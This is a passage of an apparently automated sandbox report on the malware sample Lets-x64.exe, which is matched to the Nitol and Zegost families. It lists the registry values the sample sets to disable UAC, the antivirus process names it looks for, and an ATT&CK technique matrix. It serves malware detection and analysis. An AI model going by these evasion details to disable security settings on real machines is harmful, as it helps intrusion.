                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668854D20 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00007FF668854D20
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800347B0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00000001800347B0
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668854260 HeapCreate,GetVersion,HeapSetInformation,0_2_00007FF668854260

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Contains functionality to modify Windows User Account Control (UAC) settings
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop28_2_06241B6D
                              Disable UAC(promptonsecuredesktop)
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created: PromptOnSecureDesktop 0
                              Disables UAC (registry)
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
                              Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
                              Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Nitol
                              Source: Yara matchFile source: Lets-x64.exe, type: SAMPLE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: iusb3mon.exe PID: 7272, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED
                              Yara detected Zegost
                              Source: Yara matchFile source: Lets-x64.exe, type: SAMPLE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected Nitol
                              Source: Yara matchFile source: Lets-x64.exe, type: SAMPLE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: iusb3mon.exe PID: 7272, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED
                              Yara detected Zegost
                              Source: Yara matchFile source: Lets-x64.exe, type: SAMPLE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts                              		1
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              Exploitation for Privilege Escalation                              		2
                              Disable or Modify Tools                              		121
                              Input Capture                              		2
                              System Time Discovery                              		Remote Services1
                              Archive Collected Data                              		2
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts2
                              Native API                              		1
                              Valid Accounts                              		1
                              DLL Side-Loading                              		11
                              Deobfuscate/Decode Files or Information                              		LSASS Memory4
                              File and Directory Discovery                              		Remote Desktop Protocol121
                              Input Capture                              		11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter                              		4
                              Windows Service                              		1
                              Bypass User Account Control                              		3
                              Obfuscated Files or Information                              		Security Account Manager37
                              System Information Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts11
                              Scheduled Task/Job                              		11
                              Scheduled Task/Job                              		1
                              Valid Accounts                              		22
                              Software Packing                              		NTDS251
                              Security Software Discovery                              		Distributed Component Object ModelInput Capture2
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts2
                              Service Execution                              		1
                              Registry Run Keys / Startup Folder                              		1
                              Access Token Manipulation                              		1
                              DLL Side-Loading                              		LSA Secrets241
                              Virtualization/Sandbox Evasion                              		SSHKeylogging3
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable Media2
                              PowerShell                              		RC Scripts4
                              Windows Service                              		1
                              Bypass User Account Control                              		Cached Domain Credentials2
                              Process Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                              Process Injection                              		13
                              Masquerading                              		DCSync11
                              Application Window Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                              Scheduled Task/Job                              		1
                              Valid Accounts                              		Proc Filesystem2
                              System Owner/User Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt1
                              Registry Run Keys / Startup Folder                              		1
                              Access Token Manipulation                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron241
                              Virtualization/Sandbox Evasion                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                              Process Injection                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Rundll32                              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Indicator Removal                              		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
